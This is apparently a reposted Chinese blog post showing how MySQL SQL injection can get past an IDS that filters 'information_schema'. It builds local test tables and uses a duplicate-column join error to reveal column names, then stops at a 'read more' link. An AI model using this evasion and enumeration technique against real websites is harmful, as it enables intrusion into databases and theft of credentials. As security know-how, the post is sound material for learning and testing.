绕过IDS过滤information_schema继续注入
绕过IDS过滤information_schema继续注入
来源:http://key0.cn/index.php/archives/510
mickey写的,正文如下:
原来做渗透的时候,遇到过一个站,IDS过滤了information_schema,导致后来我没有搞定,前天看文章,发现一个绕过的方法,本地测试了下,也和月牛讨论了下,最后在月牛的帮助下,把语句都构造好了,原来那个点,回去再看,也就搞定了,后来被当哥把方法给放出来了,那就公布吧。
1.本地构造测试表
mysql> create table users(id int,name varchar(20),passwd varchar(32));
Query OK, 0 rows affected (0.04 sec)
mysql> insert into users value(1,’mickey’,’827ccb0eea8a706c4c34a16891f84e7b’);
Query OK, 1 row affected (0.00 sec)
mysql> create table news(is_admin int(1),id int(2),title varchar(100),date date);
Query OK, 0 rows affected (0.00 sec)
mysql> insert into news values(1,1,’hello,mickey’,now());
Query OK, 1 row affected, 1 warning (0.00 sec)
2.暴列名
mysql> select * from (select * from users as a join news as b) as c;
ERROR 1060 (42S21): Duplicate column name ‘id’
阅读全文…
